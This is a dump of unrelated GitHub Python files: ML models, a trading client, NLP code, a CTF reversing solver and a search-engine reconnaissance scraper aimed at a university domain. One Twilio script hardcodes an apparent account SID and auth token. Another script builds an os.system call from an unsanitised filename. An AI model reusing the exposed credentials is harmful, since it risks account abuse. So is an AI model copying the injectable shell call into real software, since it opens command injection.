\"--out\", default='out', help=\"Name to output file\")\n args = vars(ap.parse_args())\n input_filename = args['csv']\n output_filename = args['out']\n \n tree = {}\n ancestor_count = 0\n group = read_csv(input_filename)\n c_features = list(group)[1:]\n root, tree, ancestor_count = divide_conquer(group, c_features, tree, ancestor_count)\n\n graphviz = 'digraph FileGenetica {\\n'\n tree_graph = build_graphviz(root, tree)\n graphviz += tree_graph + '}'\n \n file = open(output_filename + '.dot', 'w')\n file.write(graphviz)\n file.close()\n \n try:\n system('dot -Tpdf {0}.dot -o {0}.pdf'.format(output_filename))\n print('Out to PDF')\n except Exception:\n print(graphviz)\n ","repo_name":"geans/academico","sub_path":"InteligenciaArtificial2/ab1/ponto_extra/busca_em_grafo/arvore_filogenetica.py","file_name":"arvore_filogenetica.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21781950831","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\nclass InformationGathering:\n def __init__(self, target_url):\n self.url = target_url\n self.search_engine()\n\n def search_engine(self):\n search_engine = ['http://www.google.com/search', 'http://www.bing.com/search']\n title_google = []\n title_bing = []\n\n for url in search_engine:\n for x in range(0, 2):\n if url == 'http://www.google.com/search':\n params = {'q': \"site:\" + self.url,\n 'start': str(x * 10)}\n html = requests.get(url, params=params)\n soup = BeautifulSoup(html.content, 'html.parser')\n tmp = soup.find_all('h3')\n for y in range(0, len(tmp)):\n title_google.append(tmp[y].find('a').text)\n\n elif url == 'http://www.bing.com/search':\n params = {'q': \"site:\" + self.url,\n 'start': str(x * 10)}\n html = requests.get(url, params=params)\n soup = BeautifulSoup(html.content, 'html.parser')\n tmp = soup.find_all('h2')\n for y in range(0, len(tmp)):\n title_bing.append(tmp[y].find('a').text)\n\n print(\"Google\" + str(title_google))\n print(\"Bing\" + str(title_bing))\n\nif __name__ == \"__main__\":\n IG = InformationGathering(\"jbnu.ac.kr\")","repo_name":"true13/IS-OTGv4","sub_path":"InformationGathering/InformationGathering.py","file_name":"InformationGathering.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6359519094","text":"import tensorflow as tf\nfrom tensorflow.keras import (\n models,\n metrics,\n losses,\n)\n\nclass DCGAN(models.Model):\n def __init__(self, discriminator, generator, latent_dim, noise):\n super(DCGAN, self).__init__()\n self.discriminator = discriminator\n self.generator = generator\n self.latent_dim = latent_dim\n self.noise = noise\n\n def compile(self, d_optimizer, g_optimizer):\n super(DCGAN, self).compile()\n self.loss_fn = losses.BinaryCrossentropy()\n self.d_optimizer = d_optimizer\n self.g_optimizer = g_optimizer\n self.d_loss_metric = metrics.Mean(name=\"d_loss\")\n self.d_real_acc_metric = metrics.BinaryAccuracy(name=\"d_real_acc\")\n self.d_fake_acc_metric = metrics.BinaryAccuracy(name=\"d_fake_acc\")\n self.d_acc_metric = metrics.BinaryAccuracy(name=\"d_acc\")\n self.g_loss_metric = metrics.Mean(name=\"g_loss\")\n self.g_acc_metric = metrics.BinaryAccuracy(name=\"g_acc\")\n\n @property\n def metrics(self):\n return [\n self.d_loss_metric,\n self.d_real_acc_metric,\n self.d_fake_acc_metric,\n self.d_acc_metric,\n self.g_loss_metric,\n self.g_acc_metric,\n ]\n\n def train_step(self, real_images):\n # Sample random points in the latent space\n batch_size = tf.shape(real_images)[0]\n random_latent_vectors = tf.random.normal(\n shape=(batch_size, self.latent_dim)\n )\n\n # Train the discriminator on fake images\n with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:\n generated_images = self.generator(\n random_latent_vectors, training=True\n )\n real_predictions = self.discriminator(real_images, training=True)\n fake_predictions = self.discriminator(\n generated_images, training=True\n )\n\n real_labels = tf.ones_like(real_predictions)\n real_noisy_labels = real_labels + self.noise * tf.random.uniform(\n tf.shape(real_predictions)\n )\n fake_labels = tf.zeros_like(fake_predictions)\n fake_noisy_labels = fake_labels - self.noise * tf.random.uniform(\n tf.shape(fake_predictions)\n )\n\n d_real_loss = self.loss_fn(real_noisy_labels, real_predictions)\n d_fake_loss = self.loss_fn(fake_noisy_labels, fake_predictions)\n d_loss = (d_real_loss + d_fake_loss) / 2.0\n\n g_loss = self.loss_fn(real_labels, fake_predictions)\n\n gradients_of_discriminator = disc_tape.gradient(\n d_loss, self.discriminator.trainable_variables\n )\n gradients_of_generator = gen_tape.gradient(\n g_loss, self.generator.trainable_variables\n )\n\n self.d_optimizer.apply_gradients(\n zip(gradients_of_discriminator, self.discriminator.trainable_variables)\n )\n self.g_optimizer.apply_gradients(\n zip(gradients_of_generator, self.generator.trainable_variables)\n )\n\n # Update metrics\n self.d_loss_metric.update_state(d_loss)\n self.d_real_acc_metric.update_state(real_labels, real_predictions)\n self.d_fake_acc_metric.update_state(fake_labels, fake_predictions)\n self.d_acc_metric.update_state(\n [real_labels, fake_labels], [real_predictions, fake_predictions]\n )\n self.g_loss_metric.update_state(g_loss)\n self.g_acc_metric.update_state(real_labels, fake_predictions)\n\n return {m.name: m.result() for m in self.metrics}","repo_name":"Pappa/MiroBot","sub_path":"notebooks/classes/DCGAN.py","file_name":"DCGAN.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33530544660","text":"from twilio.rest import Client\nimport random\n\ndef optSender(mob):\n # Your Account Sid and Auth Token from twilio.com/console\n # and set the environment variables. See http://twil.io/secure\n account_sid ='AC7b424e70120299d5bed11730a2b33782'\n auth_token = '9af5cbd5bd4ff219f2b7204789c7f1ff'\n client = Client(account_sid, auth_token)\n\n OtpNo = random.randint(1000,9999)\n MonNo = \"+91\"+mob\n data = {\n \"OTP_NO\" : OtpNo,\n \"MobNo\" : mob,\n \"Msz\" : \"Your OTP in for Mob no verification is\"+str(OtpNo)\n }\n\n message = client.messages \\\n .create(\n body=\"Your OTP in for Mob no verification is\"+str(OtpNo),\n from_='+12159874586',\n to= MonNo\n )\n \n return data","repo_name":"DDharma/novasie-plasma-connect","sub_path":"modules/OtpSend.py","file_name":"OtpSend.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34298808617","text":"from setuptools import setup\nfrom pathlib import Path\nfrom resoup import __version__, __description__, __url__, __author__, __raw_source_url__, __author_email__, __title__\n\nlong_description = f'이 설명은 최신 버전이 아닐 수 있습니다. 만약 최신 버전을 확인하고 싶으시다면 [이 깃허브 링크]({__url__})를 참고하세요.\\n'\nlong_description += Path('README.md').read_text(encoding='utf-8')\n\n\n# def repl_script(match: re.Match) -> str:\n# if match.group('directory_type') == 'images':\n# return rf'[{match.group(\"description\")}]({__raw_source_url__}/{match.group(\"path\")})'\n\n# return rf'[{match.group(\"description\")}]({__raw_source_url__}/{match.group(\"path\")})'\n\n\n# long_description = re.sub(r'[[](?P.*?)[]][(](..\\/)*(?P(?Pimages|docs).*?)[)]',\n# repl_script, long_description)\n\n\nrequirements = [line for line in Path('requirements.txt').read_text(encoding='utf-8').splitlines()\n if line and line[0] != '#']\n\nif __name__ == '__main__':\n setup(\n name=__title__,\n version=__version__,\n description=__description__,\n author=__author__,\n author_email=__author_email__,\n long_description=long_description,\n long_description_content_type='text/markdown',\n license='MIT',\n url=__url__,\n install_requires=requirements,\n packages=['resoup'],\n keywords=['requests', 'bs4', 'BeautifulSoup', 'async', 'caching', 'cache'],\n python_requires='>=3.10',\n package_data={\n # \"\": [\"*.pyi\", 'py.typed'],\n \"\": [\"*.pyi\"],\n },\n zip_safe=False,\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n 'Programming Language :: Python :: 3.10',\n 'Programming Language :: Python :: 3.11',\n\n # resoup specific\n 'Framework :: AsyncIO',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'Topic :: Internet :: WWW/HTTP',\n ],\n )\n","repo_name":"ilotoki0804/requests-utils","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3154311461","text":"\"\"\"\n Is Unique: Implement an alogrithm to determin if a string\n has all unqiue characters. What if you cannot use\n additional data structures?\n\"\"\"\n\ndef isUnique(word):\n\tfrom collections import Counter\n\n\tcount = Counter(word)\n\n\tfor i in count.values():\n\t\tif i > 1:\n\t\t\treturn False\n\n\treturn True\n\ndef isUnique2(word):\n\t##Use a hash map to check if there will be a repeat\n\tcheck = set()\n\n\tfor letter in word:\n\t\tif letter not in check:\n\t\t\tcheck.add(letter)\n\t\telse:\n\t\t\treturn False\n\treturn True\n\n\"\"\"\nTest Cases, master edit\n\"\"\"\n\nprint(isUnique('cat'))\nprint(isUnique('hat'))\nprint(isUnique('hello'))\nprint(isUnique('lkdklj23lkjdkfjd'))\nprint('\\n')\n\nprint(isUnique2('hat'))\nprint(isUnique2('cat'))\nprint(isUnique2('hello'))\nprint(isUnique2('lkdklj23lkjdkfjd'))\n","repo_name":"thtay/Algorithms_and_DataStructure","sub_path":"CrackingCodingInterview_Python/Arrays_and_Strings/isUnique.py","file_name":"isUnique.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6427073020","text":"\"\"\"\n\nnc tasks.aeroctf.com 44324\n'\\x76\\x72\\x23\\x25\\x18\\x23\\x73\\x26\\x74\\x27\\x18\\x77\\x20\\x26\\x73\\x23\\x77\\x25\\x77\\x73\\x18\\x27\\x25\\x20\\x20\\x74\\x21\\x76\\x27\\x23\\x75\\x23'\n\n\n\ndecoded = \"\".join([chr(((ord(x) + 8) ^ 0x17) - 7) for x in encoded])\n\"\"\"\n\nfrom pwn import *\n\np = remote(\"tasks.aeroctf.com\", 44324)\nfor i in range(1001):\n if (i == 0):\n tmp = p.recvline()\n target = tmp.split(b' ')[7][1:-2].decode(\"utf-8\")\n else:\n target = tmp.split(b' ')[8][1:-2].decode(\"utf-8\")\n #target = \"00ac8ed3b4327bdd4ebbebcb2ba10a00\"\n print(target)\n encoded = b\"\"\n operand = [0x0 for x in range(3)]\n with open(target, \"rb\") as f:\n content = f.read()\n encoded += content[0x12b2:0x12ba]\n encoded += content[0x12bc:0x12c4]\n encoded += content[0x12ce:0x12d6]\n encoded += content[0x12d8:0x12e0]\n operand[0] = content[0x1303]\n operand[1] = content[0x1306]\n operand[2] = (content[0x1309] ^ 0xff) + 1\n encoded = encoded.decode(\"ascii\")\n print(\"encoded: \" + encoded)\n decoded = \"\".join([chr(((ord(x) + operand[2]) ^ operand[1]) - operand[0]) for x in encoded])\n print(\"decoded: \" + decoded)\n token = decoded\n p.sendline(token)\n tmp = p.recvline()\n print(tmp)","repo_name":"r4k0nb4k0n/CTF-Writeups","sub_path":"2020/aeroctf_2020/reverse/1000_and_1_night/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"6317891302","text":"\"\"\" CNN for network augmentation \"\"\"\nimport torch\nimport torch.nn as nn\nimport genotypes as gt\nfrom sr_models.quant_conv_lsq import QAConv2d\nfrom sr_models.ADN import AdaptiveNormalization as ADN\nfrom sr_models.RFDN.block import ESA\nfrom .quant_ops import OPS\n\ndef summer(values, increments):\n return (v + i for v, i in zip(values, increments))\n\nSUPPORT_CONV_BIT = 8\n\nclass Residual(nn.Module):\n def __init__(self, skip, body, c_out, skip_mode=True):\n super().__init__()\n self.skip = skip\n self.cum_channels = OPS[\"simple_1x1\"]((c_out // 2) * (len(body)), c_out, [SUPPORT_CONV_BIT], None, 1, False, shared=False, quant_noise=False) \n self.body = body\n self.skip_mode = skip_mode\n self.adn = ADN(c_out, skip_mode=skip_mode)\n self.esa = ESA(c_out, [8], shared=False)\n\n def forward(self, x):\n def func(x):\n return self.esa(self.body_split(x))\n\n return self.adn(x, func, x) \n\n def body_split(self, x):\n splits = []\n for i in range(len(self.body)):\n if i < len(self.body) - 1:\n splits += [self.skip[i](x)]\n x = x + self.body[i](x)\n else:\n x = self.body[i](x) \n splits += [x]\n output = self.cum_channels(torch.cat(splits, dim=1))\n return output\n\n\nclass AugmentCNN(nn.Module):\n \"\"\"Searched CNN model for final training\"\"\"\n\n def __init__(\n self, c_in, c_fixed, scale, genotype, blocks=4, skip_mode=True\n ):\n\n \"\"\"\n Args:\n input_size: size of height and width (assuming height = width)\n C_in: # of input channels\n C: # of starting model channels\n \"\"\"\n super().__init__()\n self.skip_mode = skip_mode\n self.c_fixed = c_fixed\n # self.head = gt.to_dag_sr(\n # self.c_fixed, genotype.head, gene_type=\"head\", c_in=c_in\n # )\n\n self.body = nn.ModuleList()\n for i in range(blocks):\n b = gt.to_dag_sr(\n self.c_fixed, genotype.body[i], gene_type=\"body\", c_in=c_in\n )\n s = gt.to_dag_sr(\n self.c_fixed, genotype.skip[i], gene_type=\"skip\", c_in=c_in\n )\n assert len(genotype.skip[i]) == len(genotype.body[i]) - 1\n self.body.append(Residual(s, b, c_out=self.c_fixed, skip_mode=skip_mode))\n\n upsample = gt.to_dag_sr(\n self.c_fixed, genotype.upsample, gene_type=\"upsample\"\n )\n\n self.upsample = nn.Sequential(upsample, nn.PixelShuffle(scale))\n self.tail = gt.to_dag_sr(\n self.c_fixed, genotype.tail, gene_type=\"tail\", c_in=c_in\n )\n self.quant_mode = True\n\n self.adn_one = ADN(36, skip_mode=skip_mode)\n self.adn_two = ADN(3, skip_mode=skip_mode)\n self.c = OPS[\"simple_1x1\"](self.c_fixed * blocks, self.c_fixed, [SUPPORT_CONV_BIT], self.c_fixed, 1, False, shared=False, quant_noise=False)\n self.c2 = OPS[\"simple_3x3\"](self.c_fixed, self.c_fixed, [SUPPORT_CONV_BIT], self.c_fixed, 1, False, shared=False, quant_noise=False)\n\n def forward(self, x):\n\n x = x.repeat(1, self.c_fixed // 3, 1, 1)\n head_skip = x\n\n def func(x):\n concat_skips = []\n for cell in self.body:\n x = cell(x)\n concat_skips += [x]\n concat_skips = torch.cat(concat_skips, dim=1)\n x = self.c(concat_skips)\n return self.c2(x)\n\n x = self.upsample(func(x) + head_skip) \n return x + self.tail(x)\n\n def set_fp(self):\n if self.quant_mode == True:\n for m in self.modules():\n if isinstance(m, QAConv2d):\n m.set_fp()\n self.quant_mode = False\n\n def set_quant(self):\n if self.quant_mode == False:\n for m in self.modules():\n if isinstance(m, QAConv2d):\n m.set_quant()\n self.quant_mode = True\n\n def fetch_info(self):\n sum_flops = 0\n sum_memory = 0\n for m in self.modules():\n if isinstance(m, QAConv2d):\n b, m = m._fetch_info()\n sum_flops += b\n sum_memory = m\n return (sum_flops, sum_memory)\n","repo_name":"diff7/QuanToaster","sub_path":"sr_models/augment_cnn.py","file_name":"augment_cnn.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"28897579244","text":"# from __future__ import print_function\n#\n# import zmq\n# import time\n# from random import choice\n# from random import randrange\n# import zmq\n# from datetime import datetime\n# from matplotlib.dates import date2num\n#\n#\n# context = zmq.Context()\n# socket = context.socket(zmq.SUB)\n#\n# socket.connect(\"tcp://127.0.0.1:2027\")\n#\n# socket.setsockopt(zmq.SUBSCRIBE,\"tick\")\n#\n#\n# while True:\n# string = socket.recv()\n# print(string + \" \" + str(date2num(datetime.now())))\n# print(len(string))\n\n\n# def result_collector():\n#\n# context = zmq.Context()\n# socket = context.socket(zmq.SUB)\n# socket.setsockopt(zmq.SUBSCRIBE, 'USD_CAD ')\n# socket.connect(\"tcp://127.0.0.1:5558\")\n# while True:\n# msg = socket.recv()\n# print(msg)\n#\n# result_collector()\n#\n# def publisher():\n# stock_symbols = ['RAX', 'EMC', 'GOOG', 'AAPL', 'RHAT', 'AMZN']\n#\n# context = zmq.Context()\n# socket = context.socket(zmq.PUB)\n# socket.bind(\"tcp://127.0.0.1:4999\")\n#\n# while True:\n# time.sleep(3)\n# # pick a random stock symbol\n# stock_symbol = choice(stock_symbols)\n# # set a random stock price\n# stock_price = randrange(1, 100)\n#\n# # compose the message\n# msg = \"{0} ${1}\".format(stock_symbol, stock_price)\n#\n# print(\"Sending Message: {0}\".format(msg))\n#\n# # send the message\n# socket.send(msg)\n# # Python3 Note: Use the below line and comment\n# # the above line out\n# # socket.send_string(msg)\n#\n# def subscriber():\n# context = zmq.Context()\n# socket = context.socket(zmq.SUB)\n# socket.setsockopt(zmq.SUBSCRIBE, '')\n# socket.bind(\"tcp://127.0.0.1:2027\")\n#\n# while True:\n# msg = socket.recv()\n# # Python3 Note: Use the below line and comment\n# # the above line out\n# # msg = socket.recv_string()\n# print(\" msg - \" + msg)\n\n#\n# subscriber()\n\n# publisher()\n# subscriber()\n\n# import sys\n# import zmq\n#\n# port = \"2027\"\n#\n#\n# # Socket to talk to server\n# context = zmq.Context()\n# socket = context.socket(zmq.SUB)\n#\n# socket.connect(\"tcp://localhost:%s\" % port)\n#\n# # Subscribe to zipcode, default is NYC, 10001\n# topicfilter = \"tick\"\n# socket.setsockopt(zmq.SUBSCRIBE, topicfilter)\n#\n# # Process 5 updates\n# total_value = 0\n# for update_nbr in range(5):\n# string = socket.recv()\n# topic, messagedata = string.split()\n# total_value += int(messagedata)\n# print topic, messagedata\n#\n# print \"Average messagedata value for topic '%s' was %dF\" % (topicfilter, total_value / update_nbr)\n#\n#\n#\n#\n#\n#\n\n\n\n\n\n\n# import zmq\n # import random\n # import sys\n # import time\n #\n # port = \"2027\"\n # if len(sys.argv) > 1:\n # port = sys.argv[1]\n # int(port)\n #\n # context = zmq.Context()\n # socket = context.socket(zmq.PUB)\n # socket.bind(\"tcp://*:%s\" % port)\n # while True:\n # topic = random.randrange(9999,10005)\n # messagedata = random.randrange(1,215) - 80\n # print \"%d %d\" % (topic, messagedata)\n # socket.send(\"%d %d\" % (topic, messagedata))\n # time.sleep(1)\n\n\n# compArray[0] = TRADE\n# compArray[1] = ACTION(e.g.OPEN, MODIFY, CLOSE)\n# compArray[2] = TYPE(e.g.OP_BUY, OP_SELL, etc - only\n# used\n# when\n# ACTION = OPEN)\n#\n# // ORDER\n# TYPES:\n# // https: // docs.mql4.com / constants / tradingconstants / orderproperties\n#\n# // OP_BUY = 0\n# // OP_SELL = 1\n# // OP_BUYLIMIT = 2\n# // OP_SELLLIMIT = 3\n# // OP_BUYSTOP = 4\n# // OP_SELLSTOP = 5\n#\n# compArray[3] = Symbol(e.g.EURUSD, etc.)\n# compArray[4] = Open / Close\n# Price(ignored if ACTION = MODIFY)\n# compArray[5] = SL\n# compArray[6] = TP\n# compArray[7] = lOTS\n# compArray[8] = comments / ticket\nimport time\nimport zmq\n# Sample Commands for ZeroMQ MT4 EA\neurusd_buy_order = \"TRADE|OPEN|0|EURUSD|0|50|50|0.01|Python-to-MT4\"\neurusd_sell_order = \"TRADE|OPEN|1|EURUSD|0|50|50|0.01|Python-to-MT4\"\neurusd_closebuy_order = \"TRADE|CLOSE|0|EURUSD|0|50|50|0.01\"\nget_rates = \"RATES|EURUSD\"\n\n# Sample Function for Client\ndef zeromq_mt4_ea():\n\n print(\"Starting client\")\n # Create ZMQ Context\n context = zmq.Context()\n\n # Create REQ Socket\n reqSocket = context.socket(zmq.REQ)\n reqSocket.connect(\"tcp://localhost:5555\")\n\n # Create PULL Socket\n pullSocket = context.socket(zmq.PULL)\n pullSocket.connect(\"tcp://localhost:5556\")\n\n\n # # Send RATES command to ZeroMQ MT4 EA\n remote_send(reqSocket, get_rates)\n\n # PULL from pullSocket\n remote_pull(pullSocket)\n \n\n #\n # Send BUY EURUSD command to ZeroMQ MT4 EA\n remote_send(reqSocket, eurusd_sell_order)\n time.sleep(1)\n ticket = remote_pull(pullSocket)\n if ticket is not None and '|' in ticket:\n ticket = ticket.split('|', 1)[1]\n # print(\"TICKET : \", ticket)\n else:\n ticket = -1\n\n print(remote_pull(pullSocket))\n print(remote_pull(pullSocket))\n time.sleep(5)\n # Send CLOSE EURUSD command to ZeroMQ MT4 EA. You'll need to append the\n # trade's ORDER ID to the end, as below for example:\n if ticket != -1:\n remote_send(reqSocket, eurusd_closebuy_order + \"|\" + ticket)\n\n # PULL from pullSocket\n remote_pull(pullSocket)\n\n\n\n# Function to send commands to ZeroMQ MT4 EA\ndef remote_send(socket, data):\n\n try:\n socket.send_string(data)\n time.sleep(1)\n msg = socket.recv_string()\n print(\"SENT: \", data)\n print(\"RECEIVED-REP: \", msg)\n except zmq.Again as e:\n print(\"Waiting for PUSH from MetaTrader 4..\")\n\n# Function to retrieve data from ZeroMQ MT4 EA\ndef remote_pull(socket):\n\n try:\n # msg = socket.recv(flags=zmq.NOBLOCK)\n msg = socket.recv(flags=zmq.NOBLOCK)\n print(\"RECEIVED-PULL: \", msg)\n return str(msg)\n\n except zmq.Again as e:\n print(\"Waiting for PUSH from MetaTrader 4..\") \n\n\n# Run Tests\nfor i in range (0,5):\n zeromq_mt4_ea()\n\n\n\n\n","repo_name":"mglcampos/trader","sub_path":"zmq_client.py","file_name":"zmq_client.py","file_ext":"py","file_size_in_byte":5893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15018104496","text":"masked_color = 0\r\nnon_masked_color = 255\r\n\r\ndataset = \"places2\\\\\"\r\n\r\nmethods_inpaint = [\"CRA\", \"DFN\", \"HII\"]\r\n\r\nabs_path = \"C:\\\\Users\\\\maste\\\\Documents\\\\materials\\\\\" # Указать здесь папку, где будет находится БД изображений\r\n\r\nabs_path_masks = abs_path + \"masks\\\\\"\r\nabs_path_images = abs_path + \"images\\\\\"\r\nabs_path_fragmented = abs_path + \"fragmented\\\\\"\r\nabs_path_result = abs_path + \"results\\\\\"\r\n\r\npath_mask_frame = \"mask_frame\\\\\"\r\npath_mask_noise = \"mask_noise\\\\\"\r\npath_mask_rectangle = \"mask_rectangle\\\\\"\r\npath_mask_grid = \"mask_grid\\\\\"\r\npath_mask_half = \"mask_half\\\\\"\r\n\r\npath_image_frame = \"image_frame\\\\\"\r\npath_image_noise = \"image_noise\\\\\"\r\npath_image_rectangle = \"image_rectangle\\\\\"\r\npath_image_grid = \"image_grid\\\\\"\r\npath_image_half = \"image_half\\\\\"\r\n\r\npath_recovery_frame = \"recovery_frame\\\\\"\r\npath_recovery_noise = \"recovery_noise\\\\\"\r\npath_recovery_rectangle = \"recovery_rectangle\\\\\"\r\npath_recovery_grid = \"recovery_grid\\\\\"\r\npath_recovery_half = \"recovery_half\\\\\"\r\n\r\nparams_small = [0.05, 0.1, 0.2]\r\nparams = [0.1, 0.2, 0.3, 0.4, 0.5]\r\nparams_img = [str(x) + \"_\" for x in params]\r\nparams_small_img = [str(x) + \"_\" for x in params_small]\r\n","repo_name":"Strat3g1st/NIRS","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44814099318","text":"from flask import Flask, render_template, request, redirect\nfrom urllib.request import urlopen\nimport json\nimport math\nfrom datetime import datetime\n\nfrom werkzeug.utils import redirect\n\napp = Flask(__name__)\n\napp.secret_key = 'super secret key'\n\n# go to openweathermap.org to recieve your API key!\napi_key = \"paste your api weather key here\"\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n@app.route(\"/showWeather\", methods=[\"GET\", \"POST\"])\ndef weather():\n if request.method == \"POST\":\n city = request.form.get(\"city\")\n else:\n city = \"Ahmedabad\"\n\n weather_url = urlopen(f\"http://api.openweathermap.org/data/2.5/weather?q={city}&appid={api_key}\")\n weather_data = json.loads(weather_url.read())\n\n final_temp = math.trunc(weather_data['main']['temp']-273)\n\n icon_code = weather_data['weather'][0]['icon']\n\n status = weather_data['weather'][0]['main']\n\n wind_speed = weather_data['wind']['speed']\n\n now = datetime.now()\n current_time = now.strftime(\"%H:%M\")\n # print(\"Current Time =\", current_time)\n return render_template(\"weather.html\", weather = final_temp, city = city, iconcode = icon_code, status = status, wind = wind_speed, time = current_time)\n\n@app.route(\"/home_redirect\")\ndef redirect_to_home():\n return redirect(\"/\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"AxayPatoliya/Weather-API-using-Flask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3205889521","text":"\"\"\"Runs the simulations and outputs data.\"\"\"\n\nimport numpy\nimport argparse\n\nfrom simulator import Detector, Generator\n\nimport setup\n\n\n# Parse terminal inputs\nparser = argparse.ArgumentParser(description='Runs the particle simulation.')\nparser.add_argument('--Nevents', default=1000, type=int)\n\nargs = parser.parse_args()\n\n# Initialise the generator and the detector\ngenerator = Generator(setup.theta_max)\ndetectors = [Detector(setup.boundaries, setup.Npixs, setup.z0 + i * setup.dz)\n for i in range(5)]\n\n# Get some number of events\nevents = generator.generate(args.Nevents)\n\ndata_names = ['xpixel', 'ypixel', 't', 'z']\nID_names = ['detectorID', 'eventID']\nnames = data_names + ID_names\nformats = ['float64'] * 4 + ['int64'] * 2\nout = numpy.zeros(args.Nevents * len(detectors),\n dtype={'names': names, 'formats': formats})\n\n# Processes each event at each detector and saves as numpy array\ni = 0\nfor event in events:\n eventID = hash(frozenset(event.values()))\n for detector in detectors:\n collision = detector.evaluate_collision(event)\n detectorID = hash(frozenset(collision.values()))\n for name in data_names:\n out[name][i] = collision[name]\n out['detectorID'][i] = detectorID\n out['eventID'][i] = eventID\n i += 1\n\nnumpy.save(setup.simulation_fname, out)\nprint('Finished simulating the events.')\n","repo_name":"Richard-Sti/Particle-Detector","sub_path":"runs/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22646667537","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 15 13:55:23 2020\n\n@author: kampe\n\"\"\"\n\nimport itertools\nimport logging\nfrom functools import cmp_to_key\nfrom typing import List, Tuple\n\nimport networkx as nx\nimport spacy\nfrom spacy.tokens.span import Span\n\n\nclass Hearst:\n field = \"hearst\"\n doc_section = \"abstract\"\n\n def __init__(self, model: str = \"en_core_web_lg\", extra=[]):\n \"\"\"\n Loads a spaCy model.\n\n Parameters\n ----------\n model : str\n The name of a spaCy model, e.g. \"en_core_web_lg\".\n\n Returns\n -------\n None.\n\n \"\"\"\n self.nlp = spacy.load(model, exclude=[\"ner\", \"textcat\"])\n for add_me in extra:\n if \"component\" in add_me and \"config\" in add_me:\n self.nlp.add_pipe(add_me[\"component\"], config=add_me[\"config\"])\n\n self.IntervalKey = cmp_to_key(self.interval_sort)\n\n def interval_sort(self, entity1, entity2) -> int:\n if entity1[0] < entity2[0]:\n return -1\n if entity1[0] > entity2[0]:\n return 1\n return entity2[1] - entity1[1]\n\n def conflate_conjuncts(self, chunks: List[Span]) -> List[List[Span]]:\n intervals = []\n for c in chunks:\n parts = c.conjuncts\n intervals.append(\n (\n min(min(map(lambda x: x.i, parts)), c.start),\n max(max(map(lambda x: x.i, parts)), c.end - 1),\n c,\n )\n if parts\n else (c.start, c.end - 1, c)\n )\n\n intervals.sort(key=self.IntervalKey)\n filtered = []\n start = -1\n end = -1\n for interval in intervals:\n if interval[0] >= start and interval[1] <= end:\n filtered[len(filtered) - 1].append(interval[2])\n continue\n filtered.append([interval[2]])\n start = interval[0]\n end = interval[1]\n return filtered\n\n def process(self, text: str) -> List[Tuple[str]]:\n \"\"\"\n Extended information on the technique can be found in the original paper:\n\n Hearst, M. A.\n Automatic Acquisition of Hyponyms from Large Text Corpora\n COLING 1992 Volume 2: The 15th International Conference on Computational Linguistics, 1992\n https://www.aclweb.org/anthology/C92-2082\n\n Parameters\n ----------\n text : str\n Raw text.\n\n Returns\n -------\n List[Tuple[str]]\n A list of 3-tuples stating hyponymy relations, e.g. [('X', 'such as', 'Y')].\n\n \"\"\"\n doc = self.nlp(text)\n hits = []\n\n for sent in doc.sents:\n edges = []\n for token in sent:\n for child in token.children:\n edges.append((token.i, child.i))\n\n graph = nx.Graph(edges)\n candidates = list(sent.noun_chunks)\n candidates = self.conflate_conjuncts(candidates)\n print(f\"candidates: {candidates}\")\n\n for source, target in itertools.combinations(candidates, 2):\n source_root = source[0].root.i\n target_root = target[0].root.i\n logging.debug(\"%d->%d:\", source[0].root.i, target[0].root.i)\n try:\n path = nx.shortest_path(\n graph, source=source_root, target=target_root\n )\n logging.debug([doc[x].text for x in path])\n if (\n len(path) == 3\n and doc[path[1]].text == \"as\"\n and doc[path[1] - 1].text == \"such\"\n ):\n span1 = source[0]\n if (\n doc[span1.start].pos_ == \"DET\"\n or doc[span1.start].pos_ == \"PUNCT\"\n ):\n span1 = Span(doc, span1.start + 1, span1.end)\n for t in target:\n span2 = t\n if doc[span2.start].pos_ == \"DET\":\n span2 = Span(doc, span2.start + 1, span2.end)\n hits.append((span1.text, \"such as\", span2.text))\n except nx.NetworkXNoPath:\n pass\n print(hits)\n return {Hearst.field: hits}\n\n def release_resources(self):\n del self.nlp\n","repo_name":"pikatech/Scicopia-tools","sub_path":"scicopia_tools/analyzers/Hearst.py","file_name":"Hearst.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 